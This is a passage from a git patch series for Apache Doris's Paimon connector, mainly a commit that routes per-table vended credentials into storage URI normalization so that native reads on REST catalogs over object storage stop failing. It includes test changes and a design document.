shared 类)。BE 在 `is_null==true` 时忽略 render string(`partition_column_filler.h:40-44` early-return),故 genuine-null 的 `\N`-vs-`""` render diff **不可观测**——这是 sentinel「genuine-null 无 regression」的根据。 -- **M5.1 残留**:若将来要修,唯一干净路 = SPI 加 `listSupportedSysTables(session)` no-handle overload(bridge 不经远端 existence gate 列静态名)——但会重引 legacy「为不存在 base 表列 sys-table」quirk + SPI surface churn,且须 RFC + 用户签字。broad `getTableHandle` retype 破有意 `failAuth→empty` 契约 + 触 P3 createTable fix,已否决。 -- **跨连接器 follow-up 累积**:[DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/[DV-034]/**[DV-035]** —— hudi/iceberg full-adopter 同复发,将来批量 close。 +## 🧠 给下一个 agent 的 meta(**方法**层,非结论) +- **本轮纪律**:先独立、后核对。每个路径的 verdict 必须**先**从「当前代码 + legacy 对照」得出,**再**(且仅在 reconciliation 阶段)对历史结论。历史与独立判断冲突 → 上报为新 finding,不被历史压制。这是用户对本轮的核心要求。 +- **对抗 review 反复奏效的点**:对抗 verifier 逐分支/逐角度证伪(揪「短路对≠全分支对」「deep-dive 只看单路漏另一路」);completeness critic 抓漏路径与未核 fallback。 +- **此前几轮的产物在哪**(**仅 reconciliation 阶段**参考,find-phase 勿读):`reviews/P5-paimon-rereview2-2026-06-11.md`(第二轮逐路径 + §9 cross-check)、`decisions-log.md`(D-037…D-057)、`deviations-log.md`(DV-001…DV-035)、`task-list-P5-rereview2-fixes.md`、memory `catalog-spi-p5-*`。 From 0c9865a2c7accc9df6eb217ba044471fae85b00f Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 17:58:49 +0800 Subject: [PATCH 037/128] =?UTF-8?q?fix:=20FIX-REST-VENDED-URI-NORMALIZE=20?= =?UTF-8?q?=E2=80=94=20REST=20native=20object-store=20read=20throws=20on?= =?UTF-8?q?=20URI=20normalize=20(P9-1,=20BLOCKER)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: native ORC/Parquet reads on a Paimon REST catalog over object storage (oss/cos/obs/s3a) threw during FE planning — "StoragePropertiesException: No storage properties found for schema: oss". PaimonScanPlanProvider.normalizeUri routed both the data-file path and the deletion-vector path through ConnectorContext.normalizeStorageUri, which normalizes via the catalog's STATIC storage map. That map is empty by design for REST catalogs (vended creds are per-table/dynamic; CatalogProperty.initStorageProperties seeds an empty map when vended creds are enabled), so LocationPath.of(uri, {}) found no scheme entry and threw. shouldUseNativeReader has no flavor gate, so every REST native read hit it; the only escape was SET force_jni_scanner=true. DV-025 deferred this exact corner to FIX-STATIC-CREDS-BE / FIX-REST-VENDED, but those fixed credential down-flow to BE, not normalizeStorageUri — the deferral was never closed. Legacy parity: PaimonScanNode.doInitialize computes a vended-overlay storage map once (VendedCredentialsFactory.getStoragePropertiesMapWithVendedCredentials — vended REPLACES the empty static map for REST) and uses it for LocationPath.of at both the data-file (:443) and DV (:296) sites. Solution: route the per-table vended token into native URI normalization, replicating legacy precedence. - SPI: add default overload ConnectorContext.normalizeStorageUri(uri, token) that ignores the token and delegates to the 1-arg form, so every non-paimon connector is unaffected. - fe-core DefaultConnectorContext: extract the vended-typed-map build (filter cloud props -> StorageProperties.createAll -> index by Type) into a shared buildVendedStorageMap (single source of truth with vendStorageCredentials, no drift). The 2-arg override normalizes against the vended map when present and falls back to the static map otherwise (legacy "vended replaces static"); the 1-arg form delegates with a null token (byte-identical to prior behavior). vendStorageCredentials keeps an outer try so its fail-soft boundary is preserved across the refactor. - connector PaimonScanPlanProvider: extract the vended token ONCE per planScan (validToken() may refresh) and thread it through buildNativeRanges/ buildNativeRange to both normalize sites. Empty for non-REST (FileIO gate) and offline -> folds to the static path, so non-REST reads are byte-unchanged. Tests: - fe-core DefaultConnectorContextNormalizeUriTest (+3): vended-REST normalize under an empty static map (the gap that hid the bug twice); fail-loud when the token is also empty (proves the fix is the token, not a swallow); static-map path unaffected by an empty token. - connector PaimonScanPlanProviderTest (+1, 5 call sites updated): the per-table vended token is threaded verbatim to BOTH the data-file and DV normalize calls (RecordingConnectorContext now captures the 2-arg token). - The positive RESTTokenFileIO token-extraction path needs a live REST stack and remains E2E-gated (enablePaimonTest=false), not run here. Verified: connector 42/0/0; fe-core NormalizeUri 7/0, Vend 2/0, BackendStorageProps 2/0; checkstyle 0 across spi/paimon/fe-core; connector import-gate clean. Design + adversarial red-team: plan-doc/FIX-REST-VENDED-URI-NORMALIZE-design.md. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 42 +++- .../paimon/PaimonScanPlanProviderTest.java | 45 +++- .../paimon/RecordingConnectorContext.java | 16 +- .../doris/connector/spi/ConnectorContext.java | 20 ++ .../connector/DefaultConnectorContext.java | 66 ++++-- ...faultConnectorContextNormalizeUriTest.java | 49 ++++ .../FIX-REST-VENDED-URI-NORMALIZE-design.md | 223 ++++++++++++++++++ 7 files changed, 424 insertions(+), 37 deletions(-) create mode 100644 plan-doc/FIX-REST-VENDED-URI-NORMALIZE-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 5c9427c9469718..53f04357620be9 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -342,6 +342,16 @@ private List planScanInternal( // Read the cpp-reader flag once: it selects the JNI split serialization format (see encodeSplit). boolean cppReader = isCppReaderEnabled(session); + // FIX-REST-VENDED-URI-NORMALIZE (P9-1): extract the per-table vended token ONCE per scan + // (validToken() may refresh; legacy computes its storage map once in doInitialize), threaded into + // the native-path URI normalization below so REST object-store reads normalize via the vended + // credentials (a REST catalog's static storage map is empty by design, so the static-only path + // would throw "No storage properties found for schema: oss"). Empty for non-REST tables (FileIO + // gate in extractVendedToken) and offline unit tests (no context) → the 2-arg normalize folds to + // the static-map path, leaving non-REST reads byte-unchanged. + Map vendedToken = + context != null ? extractVendedToken(table) : Collections.emptyMap(); + // Non-DataSplit → always JNI for (Split split : nonDataSplits) { ranges.add(buildJniScanRange(split, tableLocation, defaultFileFormat, @@ -402,7 +412,7 @@ private List planScanInternal( (optDeletionFiles.isPresent() && i < optDeletionFiles.get().size()) ? optDeletionFiles.get().get(i) : null; ranges.addAll(buildNativeRanges(file, deletionFile, defaultFileFormat, - partitionValues, effectiveSplitSize)); + partitionValues, vendedToken, effectiveSplitSize)); } } else { // JNI reader path @@ -429,14 +439,17 @@ private List planScanInternal( * deletion vector. BOTH the data-file path and the deletion-vector path are routed through * {@link #normalizeUri} so BE's scheme-dispatched S3 factory receives canonical {@code s3://} * URIs on OSS/COS/OBS/s3a warehouses (FIX-URI-NORMALIZE; legacy {@code PaimonScanNode} normalizes - * both via the 2-arg {@code LocationPath.of}). Package-private so both normalization sites are + * both via the 2-arg {@code LocationPath.of}). The {@code vendedToken} (empty for non-REST) is the + * per-table vended credential map, routed into normalization so REST object-store paths normalize via + * the vended map (FIX-REST-VENDED-URI-NORMALIZE). Package-private so both normalization sites are * unit-testable without a live deletion-vector-bearing split. */ PaimonScanRange buildNativeRange(RawFile file, DeletionFile deletionFile, - String defaultFileFormat, Map partitionValues, long start, long length) { + String defaultFileFormat, Map partitionValues, + Map vendedToken, long start, long length) { String fileFormat = getFileFormatBySuffix(file.path()).orElse(defaultFileFormat); PaimonScanRange.Builder builder = new PaimonScanRange.Builder() - .path(normalizeUri(file.path())) + .path(normalizeUri(file.path(), vendedToken)) .start(start) .length(length) .fileSize(file.length()) @@ -445,7 +458,8 @@ PaimonScanRange buildNativeRange(RawFile file, DeletionFile deletionFile, .schemaId(file.schemaId()); if (deletionFile != null) { builder.deletionFile( - normalizeUri(deletionFile.path()), deletionFile.offset(), deletionFile.length()); + normalizeUri(deletionFile.path(), vendedToken), + deletionFile.offset(), deletionFile.length()); } return builder.build(); } @@ -462,11 +476,12 @@ PaimonScanRange buildNativeRange(RawFile file, DeletionFile deletionFile, * DV-on-every-sub-range invariant is unit-testable without a live DV-bearing split. */ List buildNativeRanges(RawFile file, DeletionFile deletionFile, - String defaultFileFormat, Map partitionValues, long targetSplitSize) { + String defaultFileFormat, Map partitionValues, + Map vendedToken, long targetSplitSize) { List result = new ArrayList<>(); for (long[] offset : computeFileSplitOffsets(file.length(), targetSplitSize)) { - result.add(buildNativeRange( - file, deletionFile, defaultFileFormat, partitionValues, offset[0], offset[1])); + result.add(buildNativeRange(file, deletionFile, defaultFileFormat, + partitionValues, vendedToken, offset[0], offset[1])); } return result; } @@ -479,11 +494,14 @@ List buildNativeRanges(RawFile file, DeletionFile deletionFile, * file factory only recognizes {@code s3://}, so an un-normalized OSS/COS/OBS path fails the * native read (data file) or silently drops the deletion vector (merge-on-read wrong rows). The * connector cannot import fe-core's {@code LocationPath}, so it delegates to the - * {@link ConnectorContext#normalizeStorageUri} seam. With no context (offline unit tests) the raw - * path is preserved — same null-guard as the {@code vendStorageCredentials} overlay below. + * {@link ConnectorContext#normalizeStorageUri(String, Map)} seam, passing the per-table + * {@code vendedToken} (empty for non-REST) so a REST object-store path normalizes via the vended + * credentials — the catalog's static storage map is empty for REST, so the static-only path would + * throw (FIX-REST-VENDED-URI-NORMALIZE). With no context (offline unit tests) the raw path is + * preserved — same null-guard as the {@code vendStorageCredentials} overlay below. */ - private String normalizeUri(String rawUri) { - return context != null ? context.normalizeStorageUri(rawUri) : rawUri; + private String normalizeUri(String rawUri, Map vendedToken) { + return context != null ? context.normalizeStorageUri(rawUri, vendedToken) : rawUri; } @Override diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 9c93f239d2e4c9..3957ad1a5aa4f2 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -268,7 +268,7 @@ public void nativeRangeNormalizesBothDataAndDeletionVectorPaths() { "oss://bkt/warehouse/db/t/index/dv-0.index", 8L, 16L, 4L); PaimonScanRange range = provider.buildNativeRange( - file, dv, "parquet", Collections.emptyMap(), 0L, 100L); + file, dv, "parquet", Collections.emptyMap(), Collections.emptyMap(), 0L, 100L); // WHY: BE's scheme-dispatched S3 file factory only opens canonical s3://. An un-normalized // oss:// DATA-file path fails the native ORC/Parquet read outright; an un-normalized oss:// DV @@ -293,7 +293,7 @@ public void nativeRangeWithoutDeletionVectorNormalizesOnlyDataPath() { PaimonScanRange range = provider.buildNativeRange( parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", - Collections.emptyMap(), 0L, 100L); + Collections.emptyMap(), Collections.emptyMap(), 0L, 100L); // WHY: a DV-less native split must still normalize its data-file path and must NOT emit a DV // descriptor. MUTATION: emitting a deletion_file for a null DV, or skipping data normalization -> red. @@ -313,12 +313,47 @@ public void nativeRangeWithoutContextPreservesRawPath() { PaimonScanRange range = provider.buildNativeRange( parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", - Collections.emptyMap(), 0L, 100L); + Collections.emptyMap(), Collections.emptyMap(), 0L, 100L); // MUTATION: NPE on null context, or fabricating a normalized path from nothing -> red. Assertions.assertEquals("oss://bkt/a/part-0.parquet", range.getPath().orElse(null)); } + @Test + public void buildNativeRangeThreadsVendedTokenToBothPaths() { + // FIX-REST-VENDED-URI-NORMALIZE (P9-1, BLOCKER): the per-table vended token must reach the + // engine's normalize seam on BOTH the data-file AND the deletion-vector path, so a REST + // object-store read (whose catalog static storage map is empty by design) normalizes via the + // vended credentials instead of throwing "No storage properties found for schema: oss". The + // positive RESTTokenFileIO extraction needs a live REST stack (E2E-gated); here we pin that + // whatever token the scan computes is threaded VERBATIM to each normalize call. + RecordingConnectorContext ctx = new RecordingConnectorContext(); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps(), ctx); + Map vendedToken = new HashMap<>(); + vendedToken.put("fs.oss.accessKeyId", "STS.ak"); + vendedToken.put("fs.oss.accessKeySecret", "sk"); + RawFile file = parquetRawFile("oss://bkt/warehouse/db/t/part-0.parquet"); + DeletionFile dv = new DeletionFile( + "oss://bkt/warehouse/db/t/index/dv-0.index", 8L, 16L, 4L); + + PaimonScanRange range = provider.buildNativeRange( + file, dv, "parquet", Collections.emptyMap(), vendedToken, 0L, 100L); + + // WHY: the engine seam normalizes against the VENDED map (the REST static map is empty). If the + // connector dropped the token (reverting to the 1-arg seam) or substituted an empty map, a REST + // native read would reach BE with an un-openable oss:// (data) or a silently-dropped DV + // (merge-on-read corruption). MUTATION: 1-arg normalize (token lost -> lastVendedToken null), or + // passing Collections.emptyMap() instead of the token -> assertSame red. + Assertions.assertEquals("s3://bkt/warehouse/db/t/part-0.parquet", range.getPath().orElse(null)); + Assertions.assertEquals("s3://bkt/warehouse/db/t/index/dv-0.index", + range.getProperties().get("paimon.deletion_file.path")); + Assertions.assertEquals(2, ctx.normalizeCount, + "both the data-file and the DV path must route through the vended-aware normalize"); + Assertions.assertSame(vendedToken, ctx.lastVendedToken, + "the per-table vended token must be threaded to the normalize seam (not empty/null)"); + } + @Test public void resolveScanTableAppliesSnapshotPinViaCopy() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); @@ -780,7 +815,7 @@ public void buildNativeRangesAttachesSameDeletionVectorToEverySubRange() { long target = Math.max(1L, file.length() / 3); // force the file to sub-split into >=2 ranges List ranges = provider.buildNativeRanges( - file, dv, "parquet", Collections.emptyMap(), target); + file, dv, "parquet", Collections.emptyMap(), Collections.emptyMap(), target); // WHY: the load-bearing correctness claim of FIX-NATIVE-SUBSPLIT — a paimon deletion vector is a // bitmap of GLOBAL file row positions, so EVERY sub-range of a DV-bearing file must carry the @@ -808,7 +843,7 @@ public void buildNativeRangesKeepsFileWholeWhenTargetNonPositive() { RawFile file = parquetRawFile("oss://bkt/a/part-0.parquet"); List ranges = provider.buildNativeRanges( - file, null, "parquet", Collections.emptyMap(), 0L); + file, null, "parquet", Collections.emptyMap(), Collections.emptyMap(), 0L); Assertions.assertEquals(1, ranges.size(), "a non-positive target (COUNT(*) pushdown) must keep the file as one whole-file range"); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java index 7952f99c834a14..98e7882db36ce4 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java @@ -46,9 +46,11 @@ final class RecordingConnectorContext implements ConnectorContext { /** The {@code resources} string the connector passed to {@link #loadHiveConfResources}. */ String lastHiveConfResourcesArg; - // ---- FIX-URI-NORMALIZE: normalizeStorageUri hook ---- + // ---- FIX-URI-NORMALIZE / FIX-REST-VENDED-URI-NORMALIZE: normalizeStorageUri hook ---- /** Number of times the connector invoked {@link #normalizeStorageUri}. */ int normalizeCount; + /** The vended token the connector passed to the most recent 2-arg {@link #normalizeStorageUri}. */ + Map lastVendedToken; @Override public String getCatalogName() { @@ -57,10 +59,18 @@ public String getCatalogName() { @Override public String normalizeStorageUri(String rawUri) { + // The 1-arg form folds to the 2-arg with no token, so every caller path is recorded identically. + return normalizeStorageUri(rawUri, null); + } + + @Override + public String normalizeStorageUri(String rawUri, Map vendedToken) { normalizeCount++; + lastVendedToken = vendedToken; // Deterministic stand-in for the engine's oss://->s3:// scheme rewrite, so a connector wiring - // test can prove BOTH the data-file and DV paths were routed through this hook (the real - // normalization is covered by DefaultConnectorContextNormalizeUriTest in fe-core). + // test can prove BOTH the data-file and DV paths were routed through this hook AND that the + // per-table vended token is threaded to each (the real normalization is covered by + // DefaultConnectorContextNormalizeUriTest in fe-core). if (rawUri != null && rawUri.startsWith("oss://")) { return "s3://" + rawUri.substring("oss://".length()); } diff --git a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java index 484908636610d0..6a7fb7965ab69c 100644 --- a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java +++ b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java @@ -163,6 +163,26 @@ default String normalizeStorageUri(String rawUri) { return rawUri; } + /** + * Vended-credential-aware variant of {@link #normalizeStorageUri(String)}. For a REST catalog the + * catalog's static storage map is empty by design (vended creds are per-table/dynamic), so + * the single-arg form would throw on an object-store path. This overload lets the connector pass the + * raw per-table vended token (the same map it gives {@link #vendStorageCredentials}); the engine + * normalizes the URI against the vended credentials when present and falls back to the static map + * otherwise (legacy {@code VendedCredentialsFactory} precedence: vended replaces static). + * + *

      The default ignores the token and delegates to {@link #normalizeStorageUri(String)}, so every + * connector that has no vended credentials — and the no-op default — is unaffected. + * + * @param rawUri the raw storage URI (null/blank is returned unchanged) + * @param rawVendedCredentials the raw per-table vended token map (may be null/empty → static path) + * @return the normalized BE-facing URI + * @throws RuntimeException if normalization fails (fail-loud, legacy parity) + */ + default String normalizeStorageUri(String rawUri, Map rawVendedCredentials) { + return normalizeStorageUri(rawUri); + } + /** * Returns the catalog's static storage credentials/config normalized to BE-canonical scan * properties: object-store creds as {@code AWS_ACCESS_KEY} / {@code AWS_SECRET_KEY} / diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java index 3f9dbbdee0d8cf..a9fbb46dc94d81 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java @@ -154,27 +154,47 @@ public Map loadHiveConfResources(String resources) { @Override public Map vendStorageCredentials(Map rawVendedCredentials) { - if (rawVendedCredentials == null || rawVendedCredentials.isEmpty()) { + // Map the per-table vended token to the BE-facing AWS_* properties. Fail-soft (empty) on any + // error, matching the legacy provider, so a malformed token degrades gracefully rather than + // killing the scan. The outer try also covers getBackendPropertiesFromStorageMap so the + // fail-soft boundary is byte-identical to the pre-refactor method; buildVendedStorageMap shares + // the typed-map build with normalizeStorageUri (single source of truth — no drift). + try { + Map map = buildVendedStorageMap(rawVendedCredentials); + return map == null ? Collections.emptyMap() + : CredentialUtils.getBackendPropertiesFromStorageMap(map); + } catch (Exception e) { + LOG.warn("Failed to normalize vended credentials", e); return Collections.emptyMap(); } - // Reuse the EXACT legacy normalization tail (AbstractVendedCredentialsProvider): filter to - // cloud-storage props, run StorageProperties.createAll (normalizes arbitrary token key shapes - // + derives region/endpoint), then map to the BE-facing AWS_* properties. Single source of - // truth — no re-ported normalization that could drift. Fail-soft (empty) on any error, - // matching the legacy provider, so a malformed token degrades gracefully rather than killing - // the scan. + } + + /** + * Builds the vended {@link StorageProperties} typed map from a raw per-table token: filter to + * cloud-storage props, run {@link StorageProperties#createAll} (normalizes arbitrary token key + * shapes + derives region/endpoint), then index by {@link StorageProperties.Type}. Mirrors the + * legacy {@code AbstractVendedCredentialsProvider} tail exactly, so the BE-credential overlay + * ({@link #vendStorageCredentials}) and the URI normalization ({@link #normalizeStorageUri(String, + * Map)}) derive the SAME credentials from the SAME token — no drift. Returns {@code null} when the + * token is null/empty, yields no cloud-storage props, or normalization throws — replicating the + * legacy provider's "return null → Factory falls back to the base/static map" contract. + */ + private Map buildVendedStorageMap( + Map rawVendedCredentials) { + if (rawVendedCredentials == null || rawVendedCredentials.isEmpty()) { + return null; + } try { Map filtered = CredentialUtils.filterCloudStorageProperties(rawVendedCredentials); if (filtered.isEmpty()) { - return Collections.emptyMap(); + return null; } List vended = StorageProperties.createAll(filtered); - Map map = vended.stream() + return vended.stream() .collect(Collectors.toMap(StorageProperties::getType, Function.identity())); - return CredentialUtils.getBackendPropertiesFromStorageMap(map); } catch (Exception e) { LOG.warn("Failed to normalize vended credentials", e); - return Collections.emptyMap(); + return null; } } @@ -191,16 +211,28 @@ public Map getBackendStorageProperties() { @Override public String normalizeStorageUri(String rawUri) { + // No vended token → normalize against the catalog's static storage map (behavior unchanged). + return normalizeStorageUri(rawUri, null); + } + + @Override + public String normalizeStorageUri(String rawUri, Map rawVendedCredentials) { if (Strings.isNullOrEmpty(rawUri)) { return rawUri; } // Mirror legacy PaimonScanNode's 2-arg LocationPath.of(path, storagePropertiesMap): - // scheme-normalize (oss/cos/obs/s3a -> s3, OSS bucket.endpoint -> bucket) via the catalog's - // static storage properties so BE's scheme-dispatched S3 factory can open the file. Fail-loud - // (StoragePropertiesException propagates) — a path that cannot be normalized would otherwise - // silently corrupt reads (esp. a deletion-vector path on merge-on-read). Single source of - // truth: the SAME LocationPath normalization legacy/iceberg/hive use, so no drift. - return LocationPath.of(rawUri, storagePropertiesSupplier.get()).toStorageLocation().toString(); + // scheme-normalize (oss/cos/obs/s3a -> s3, OSS bucket.endpoint -> bucket) so BE's + // scheme-dispatched S3 factory can open the file. The storage map follows legacy + // VendedCredentialsFactory precedence: when the connector supplies a per-table vended token + // (REST catalogs, whose static map is empty by design) the VENDED map REPLACES the static map; + // otherwise the catalog's static storage map is used. Fail-loud (StoragePropertiesException + // propagates) — a path that cannot be normalized would otherwise silently corrupt reads (esp. a + // deletion-vector path on merge-on-read). Single source of truth: the SAME LocationPath + // normalization legacy/iceberg/hive use, so no drift. + Map vended = buildVendedStorageMap(rawVendedCredentials); + Map effective = + vended != null ? vended : storagePropertiesSupplier.get(); + return LocationPath.of(rawUri, effective).toStorageLocation().toString(); } private static Map buildEnvironment() { diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextNormalizeUriTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextNormalizeUriTest.java index 5d5997ef894777..bc586f06e561d2 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextNormalizeUriTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextNormalizeUriTest.java @@ -23,6 +23,7 @@ import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; +import java.util.Collections; import java.util.HashMap; import java.util.List; import java.util.Map; @@ -96,4 +97,52 @@ public void failsLoudWhenNoStoragePropertiesForScheme() { Assertions.assertThrows(RuntimeException.class, () -> noStorage.normalizeStorageUri("oss://bkt/a/part-0.parquet")); } + + // ---- FIX-REST-VENDED-URI-NORMALIZE (P9-1): the 2-arg overload normalizes via the per-table + // vended token, which is the ONLY storage map a REST catalog has (its static map is empty). ---- + + /** The raw per-table OSS vended token shape a REST catalog returns (mirrors + * DefaultConnectorContextVendTest / PaimonVendedCredentialsProviderTest). */ + private static Map ossVendedToken() { + Map token = new HashMap<>(); + token.put("fs.oss.accessKeyId", "STS.testAccessKey123"); + token.put("fs.oss.accessKeySecret", "testSecretKey456"); + token.put("fs.oss.securityToken", "testSessionToken789"); + token.put("fs.oss.endpoint", "oss-cn-beijing.aliyuncs.com"); + return token; + } + + @Test + public void vendedRestCredentialsNormalizeUnderEmptyStaticMap() { + // THE BUG (P9-1, BLOCKER): a REST catalog's static storage map is EMPTY by design (vended creds + // are per-table/dynamic), so the static-only path throws "No storage properties found for schema: + // oss" on a native ORC/Parquet read — the exact corner DV-025 deferred but never closed. The + // 2-arg overload normalizes against the per-table VENDED token instead (legacy + // VendedCredentialsFactory: the vended map REPLACES the empty static map). MUTATION: ignoring the + // token (the old static-only path) -> throws -> red. + DefaultConnectorContext restCtx = new DefaultConnectorContext("c", 1L); // empty static map = REST + Assertions.assertEquals("s3://bkt/warehouse/db/t/part-0.parquet", + restCtx.normalizeStorageUri("oss://bkt/warehouse/db/t/part-0.parquet", ossVendedToken())); + } + + @Test + public void emptyTokenUnderEmptyStaticStillFailsLoud() { + // WHY: prove the fix is the TOKEN, not a swallow — with an empty static map AND no vended token + // there is genuinely no credential, so normalization must still FAIL LOUD (legacy parity) rather + // than ship the raw oss:// to BE (silent read corruption). MUTATION: swallowing to the raw path + // when the token is empty -> red. + DefaultConnectorContext restCtx = new DefaultConnectorContext("c", 1L); + Assertions.assertThrows(RuntimeException.class, + () -> restCtx.normalizeStorageUri("oss://bkt/a/part-0.parquet", Collections.emptyMap())); + } + + @Test + public void staticMapPathUnaffectedByEmptyToken() throws Exception { + // WHY: the 2-arg overload with an EMPTY token must fold to the static-map path byte-identically + // to the 1-arg form, so non-REST (static-cred) reads are unchanged. MUTATION: an empty token + // suppressing the static map -> no normalization / throw -> red. + Assertions.assertEquals("s3://bkt/warehouse/db/t/part-0.parquet", + ossContext().normalizeStorageUri( + "oss://bkt/warehouse/db/t/part-0.parquet", Collections.emptyMap())); + } } diff --git a/plan-doc/FIX-REST-VENDED-URI-NORMALIZE-design.md b/plan-doc/FIX-REST-VENDED-URI-NORMALIZE-design.md new file mode 100644 index 00000000000000..d581d1275a19b6 --- /dev/null +++ b/plan-doc/FIX-REST-VENDED-URI-NORMALIZE-design.md @@ -0,0 +1,223 @@ +# FIX-REST-VENDED-URI-NORMALIZE — Design + +> Source: `reviews/P5-paimon-rereview3-2026-06-12.md` §D.1 (P9-1, **BLOCKER**); task `task-list-P5-rereview3-fixes.md` FIX-1. +> Scope (user-approved 2026-06-12): route the vended-overlay storage map into native URI normalization (legacy parity). + +## Problem + +`SELECT` over a Paimon **REST**-catalog table on **object storage** (oss/cos/obs/s3a), using the +native reader (ORC/Parquet — the default), throws during FE planning: + +``` +StoragePropertiesException: No storage properties found for schema: oss +``` + +It worked under legacy paimon. The only escape hatch today is `SET force_jni_scanner=true` (which +dodges the native path entirely). So every native REST-on-object-store read is broken. + +## Root Cause + +Native URI normalization uses the **static** catalog storage-properties map, which is **empty by +design for REST** catalogs (vended creds are per-table/dynamic, so `CatalogProperty.initStorageProperties` +seeds an empty static map when vended creds are enabled). + +Call chain (verified against current tree): +- Connector `PaimonScanPlanProvider.normalizeUri:485-487` → `context.normalizeStorageUri(rawUri)`. +- fe-core `DefaultConnectorContext.normalizeStorageUri:193-204` → `LocationPath.of(rawUri, storagePropertiesSupplier.get())` (the 2-arg overload; `normalize=true` is supplied internally by the 2-arg→3-arg delegation at `LocationPath.java:181`). +- The supplier is the catalog-static map (`PluginDrivenExternalCatalog`), **empty for REST**. +- `LocationPath.of:135-140` → `findStorageProperties(type, schema, {}) == null` → `throw new UserException("No storage properties found for schema: " + schema)` → wrapped as `StoragePropertiesException` (a `RuntimeException`). + +`shouldUseNativeReader:783` has **no flavor gate**, so REST native reads reach `normalizeUri` on the +data-file path (`buildNativeRange:439`) **and** the deletion-vector path (`:448`). + +**Why it slipped through twice**: DV-025 deferred this exact corner to FIX-STATIC-CREDS-BE / +FIX-REST-VENDED, but those fixed **credential down-flow to BE** (`getScanNodeProperties` overlay, +`:546-562`), not `normalizeStorageUri`. The deferral was never closed → still live. + +### Legacy parity reference +`paimon/source/PaimonScanNode.doInitialize:171-176` computes a **vended-overlay** storage map once: + +```java +storagePropertiesMap = VendedCredentialsFactory.getStoragePropertiesMapWithVendedCredentials( + catalog...getMetastoreProperties(), catalog...getStoragePropertiesMap(), source.getPaimonTable()); +``` + +and uses **that** map for `LocationPath.of` at `:443` (data file) and `:296` (deletion vector). + +Confirmed semantics of `getStoragePropertiesMapWithVendedCredentials` (→ `PaimonVendedCredentialsProvider` +→ `AbstractVendedCredentialsProvider`): +- REST metastore + table has a `RESTTokenFileIO` with a valid token + the filtered token yields ≥1 + cloud-storage prop → returns a **vended-only** typed map built from the token + (`filterCloudStorageProperties` → `StorageProperties.createAll` → index by `Type`). The factory uses + it **as-is, discarding the base/static map** (vended *replaces* static — for REST the static map is + empty anyway, so no practical difference, but we replicate it exactly). +- Otherwise (non-REST, no token, filtered-empty, or any exception) → provider returns `null` → factory + **falls back to the base/static map**. + +The connector already extracts that raw token: `extractVendedToken(table):584-595` (gated on +`fileIO instanceof RESTTokenFileIO`; empty for non-REST), and already feeds it to +`context.vendStorageCredentials(...)` for the BE credential overlay (`:558`). + +## Design + +**Approach (a)** from the task list (recommended): add an SPI overload +`ConnectorContext.normalizeStorageUri(String rawUri, Map rawVendedCredentials)` that +normalizes against the **vended-overlay** map (legacy parity). The connector passes the raw vended +token it already extracts; fe-core builds the typed `StorageProperties` map (it cannot be done in the +connector — `LocationPath`/`StorageProperties` are fe-core-only). + +Rejected alternatives: +- (b) vended-aware supplier — vended creds are per-table/dynamic; the supplier is catalog-static. Wrong layer. +- (c) "static-map-misses-scheme → use vended" implicit fallback — narrower and implicit; (a) is explicit and matches legacy precedence exactly. + +### fe-core (`DefaultConnectorContext`) +Extract the vended-typed-map construction (already inline in `vendStorageCredentials`) into a private +helper, then use it from both methods (single source of truth, no drift between the BE-creds path and +the normalize path — they MUST agree: same token → same creds → same normalization): + +```java +/** Build the vended StorageProperties typed map from a raw token (filter cloud props + createAll + + * index by Type), mirroring AbstractVendedCredentialsProvider. Returns null when the token is + * null/empty, yields no cloud props, or normalization throws — exactly the legacy provider's + * "return null -> Factory falls back to base" contract. 